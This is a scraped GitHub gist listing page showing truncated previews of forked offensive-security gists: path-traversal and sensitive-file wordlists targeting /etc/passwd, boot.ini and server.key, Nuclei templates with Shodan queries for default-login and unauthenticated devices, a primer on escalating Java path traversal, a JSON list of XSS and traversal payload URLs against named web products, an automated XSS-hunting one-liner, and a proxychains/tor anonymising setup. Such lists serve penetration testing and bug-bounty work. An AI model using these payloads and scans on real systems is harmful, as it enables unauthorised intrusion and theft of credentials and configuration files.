emadshanab
/ qualys_wordlist.txt
Created
November 21, 2022 22:30
— forked from nullenc0de/qualys_wordlist.txt
Qualys Wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| /. | |
| /.* | |
| /../../../../../../../../../../../ | |
| /../../../../../../../../../../../../boot.ini | |
| /../../../../../../../../../../../../etc/passwd | |
| /../../../../../../../winnt/system32/cmd.exe | |
| /../../..//index.html | |
| /../index.html | |
| /.bzr/ |
emadshanab
/ interesting_dirsearch.txt
Created
November 21, 2022 22:29
— forked from nullenc0de/interesting_dirsearch.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| uploads/affwp-debug.log | |
| certs/server.key | |
| server.key | |
| .CSV | |
| .README.md.bud | |
| .action | |
| .actionScriptProperties | |
| .angular-cli.json | |
| .apport-ignore.xml |
emadshanab
/ goip-default-login.yaml
Created
October 30, 2022 21:59
— forked from drfabiocastro/goip-default-login.yaml
GoIP GSM VoIP Gateway Default Login
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: goip-default-login | |
| info: | |
| name: GoIP GSM VoIP Gateway Default Login | |
| author: drfabiocastro | |
| severity: high | |
| description: GoIP GSM VoIP Gateway default login and password | |
| metadata: | |
| shodan-query: 'HTTP/1.0 401 Please Authenticate\r\nWWW-Authenticate: Basic realm="Please Login"' | |
| tags: voip,gateway,gsm |
emadshanab
/ genymotion-cloud-display.yaml
Created
October 30, 2022 21:59
— forked from drfabiocastro/genymotion-cloud-display.yaml
Genymotion device without authentication, allows attackers to control the device
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: genymotion-cloud-display | |
| info: | |
| name: Genymotion Cloud Display | |
| author: drfabiocastro | |
| severity: high | |
| description: Genymotion device without authentication, allows attackers to control the device | |
| metadata: | |
| shodan-query: http.title:"Genymotion Cloud" | |
| tags: genymotion,android |
emadshanab
/ exploit_path_traversals_in_Java_webapps.txt
Created
September 22, 2022 20:23
— forked from harisec/exploit_path_traversals_in_Java_webapps.txt
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| so, you can read WEB-INF/web.xml. how can you escalate this issue? | |
| [step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. | |
| use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan): | |
| https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt | |
| with time you can build your own wordlist adding files you've discovered over time. | |
| use Burp Intruder for this, it's perfect for this job. | |
| sort Intruder results by status code so you can see instantly which files were found. |
emadshanab
/ ruby-sensitive-files.txt
Created
September 22, 2022 20:23
— forked from harisec/ruby-sensitive-files.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| database.yml | |
| database.yml_original | |
| database.yml~ | |
| database.yml.pgsql | |
| database.yml.sqlite3 | |
| config/database.yml | |
| config/database.yml_original | |
| config/database.yml~ | |
| config/database.yml.pgsql | |
| config/database.yml.sqlite3 |
emadshanab
/ requests.json
Created
September 16, 2022 16:57
— forked from GuanacoDevs/requests.json
Endpoints used
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| "/ui/vropspluginui/rest/services/getstatus", | |
| "/ghost/preview", | |
| "/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page", | |
| "/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E", | |
| "/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E", | |
| "/log_download.cgi?type=../../etc/passwd", | |
| "/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E", | |
| "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E", | |
| "/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00", |
emadshanab
/ xss-one-liner
Created
August 28, 2022 08:07
— forked from simrotion13/xss-one-liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #cat targets_urls.txt | |
| http://testphp.vulnweb.com | |
| ## Command Line | |
| gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt | |
| #tool used | |
| #https://github.com/jaeles-project/gospider | |
| #https://github.com/tomnomnom/qsreplace |
emadshanab
/ swagger-ui nuclei module
Created
August 28, 2022 08:03
— forked from kannthu/swagger-ui nuclei module
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: swagger-ui | |
| info: | |
| name: Swagger UI | |
| author: vidocsecurity | |
| severity: low | |
| description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS | |
| tags: swagger-ui,exposure | |
| requests: |
emadshanab
/ how to use
Created
August 11, 2022 01:06
— forked from carlware/how to use
proxychains and tor (change ip ~10 seconds)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install | |
| sudo apt-get install proxychains | |
| sudo apt-get install tor | |
| # then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config | |
| # restart tor server | |
| sudo service restart tor |